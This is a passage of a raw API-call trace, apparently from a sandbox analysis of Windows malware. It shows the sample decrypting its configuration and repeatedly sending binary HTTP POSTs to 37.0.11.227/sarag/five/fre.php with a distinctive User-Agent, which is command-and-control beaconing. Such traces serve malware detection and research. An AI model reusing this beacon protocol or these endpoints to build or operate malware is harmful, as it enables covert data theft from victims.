ai_next=0x0)) returned 0 [0262.593] GetProcessHeap () returned 0x690000 [0262.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0262.593] socket (af=2, type=1, protocol=6) returned 0x79c [0262.599] connect (s=0x79c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0262.626] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0262.626] GetProcessHeap () returned 0x690000 [0262.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0262.626] GetProcessHeap () returned 0x690000 [0262.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0262.627] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0262.631] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0262.631] GetProcessHeap () returned 0x690000 [0262.631] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0262.631] GetProcessHeap () returned 0x690000 [0262.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0262.632] GetProcessHeap () returned 0x690000 [0262.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0262.632] GetProcessHeap () returned 0x690000 [0262.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0262.670] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0262.706] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0262.706] GetProcessHeap () returned 0x690000 [0262.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0262.706] GetProcessHeap () returned 0x690000 [0262.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0262.707] send (s=0x79c, buf=0x6ad508*, len=242, flags=0) returned 242 [0262.707] send (s=0x79c, buf=0x6aba40*, len=159, flags=0) returned 159 [0262.707] GetProcessHeap () returned 0x690000 [0262.707] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0262.707] recv (in: s=0x79c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0262.821] GetProcessHeap () returned 0x690000 [0262.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0262.821] GetProcessHeap () returned 0x690000 [0262.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0262.822] GetProcessHeap () returned 0x690000 [0262.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0262.822] GetProcessHeap () returned 0x690000 [0262.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0262.825] closesocket (s=0x79c) returned 0 [0262.826] GetProcessHeap () returned 0x690000 [0262.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0262.826] GetProcessHeap () returned 0x690000 [0262.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0262.827] GetProcessHeap () returned 0x690000 [0262.828] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0262.828] GetProcessHeap () returned 0x690000 [0262.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0262.844] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x154c) returned 0x79c [0262.860] Sleep (dwMilliseconds=0xea60) [0262.862] GetProcessHeap () returned 0x690000 [0262.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0262.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.865] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0262.915] GetProcessHeap () returned 0x690000 [0262.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0262.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.917] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0262.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.919] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.920] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.921] GetProcessHeap () returned 0x690000 [0262.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0262.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.927] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0262.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.993] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0262.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.995] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0262.995] GetProcessHeap () returned 0x690000 [0262.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0262.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.999] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.001] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.003] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.006] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.006] GetProcessHeap () returned 0x690000 [0263.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0263.007] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0263.015] GetProcessHeap () returned 0x690000 [0263.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0263.017] GetProcessHeap () returned 0x690000 [0263.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0263.029] GetProcessHeap () returned 0x690000 [0263.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0263.035] GetProcessHeap () returned 0x690000 [0263.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0263.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.041] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0263.093] GetProcessHeap () returned 0x690000 [0263.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0263.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.100] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0263.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.101] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.102] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.102] GetProcessHeap () returned 0x690000 [0263.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0263.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.109] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0263.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.110] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0263.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.111] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0263.111] GetProcessHeap () returned 0x690000 [0263.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0263.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.112] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0263.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.113] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0263.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.114] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0263.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.115] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0263.115] GetProcessHeap () returned 0x690000 [0263.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0263.115] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0263.116] GetProcessHeap () returned 0x690000 [0263.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0263.116] socket (af=2, type=1, protocol=6) returned 0x7a0 [0263.116] connect (s=0x7a0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0263.218] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0263.219] GetProcessHeap () returned 0x690000 [0263.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0263.219] GetProcessHeap () returned 0x690000 [0263.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0263.220] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0263.221] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0263.221] GetProcessHeap () returned 0x690000 [0263.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0263.221] GetProcessHeap () returned 0x690000 [0263.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0263.222] GetProcessHeap () returned 0x690000 [0263.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0263.222] GetProcessHeap () returned 0x690000 [0263.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0263.223] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0263.224] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0263.224] GetProcessHeap () returned 0x690000 [0263.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0263.224] GetProcessHeap () returned 0x690000 [0263.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0263.225] send (s=0x7a0, buf=0x6ad508*, len=242, flags=0) returned 242 [0263.225] send (s=0x7a0, buf=0x6aba40*, len=159, flags=0) returned 159 [0263.226] GetProcessHeap () returned 0x690000 [0263.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0263.226] recv (in: s=0x7a0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0263.303] GetProcessHeap () returned 0x690000 [0263.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0263.304] GetProcessHeap () returned 0x690000 [0263.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0263.304] GetProcessHeap () returned 0x690000 [0263.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0263.304] GetProcessHeap () returned 0x690000 [0263.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0263.305] closesocket (s=0x7a0) returned 0 [0263.305] GetProcessHeap () returned 0x690000 [0263.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0263.305] GetProcessHeap () returned 0x690000 [0263.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0263.306] GetProcessHeap () returned 0x690000 [0263.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0263.306] GetProcessHeap () returned 0x690000 [0263.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0263.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1550) returned 0x7a0 [0263.309] Sleep (dwMilliseconds=0xea60) [0263.310] GetProcessHeap () returned 0x690000 [0263.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0263.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.318] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0263.327] GetProcessHeap () returned 0x690000 [0263.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0263.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.329] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0263.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.331] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.337] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.337] GetProcessHeap () returned 0x690000 [0263.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0263.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.341] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0263.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.352] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0263.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.355] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0263.355] GetProcessHeap () returned 0x690000 [0263.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0263.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.359] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.361] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.362] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.370] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.370] GetProcessHeap () returned 0x690000 [0263.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0263.370] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0263.370] GetProcessHeap () returned 0x690000 [0263.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0263.375] GetProcessHeap () returned 0x690000 [0263.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0263.382] GetProcessHeap () returned 0x690000 [0263.383] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0263.386] GetProcessHeap () returned 0x690000 [0263.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0263.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.388] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.395] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0263.406] GetProcessHeap () returned 0x690000 [0263.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0263.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.411] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0263.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.413] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.415] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.415] GetProcessHeap () returned 0x690000 [0263.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0263.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.468] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0263.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.469] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0263.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0263.471] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0263.471] GetProcessHeap () returned 0x690000 [0263.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0263.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.473] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0263.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.477] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0263.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.478] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0263.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.480] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0263.480] GetProcessHeap () returned 0x690000 [0263.480] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0263.480] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0263.480] GetProcessHeap () returned 0x690000 [0263.480] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0263.480] socket (af=2, type=1, protocol=6) returned 0x7a4 [0263.481] connect (s=0x7a4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0263.520] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0263.520] GetProcessHeap () returned 0x690000 [0263.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0263.520] GetProcessHeap () returned 0x690000 [0263.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0263.521] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0263.522] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 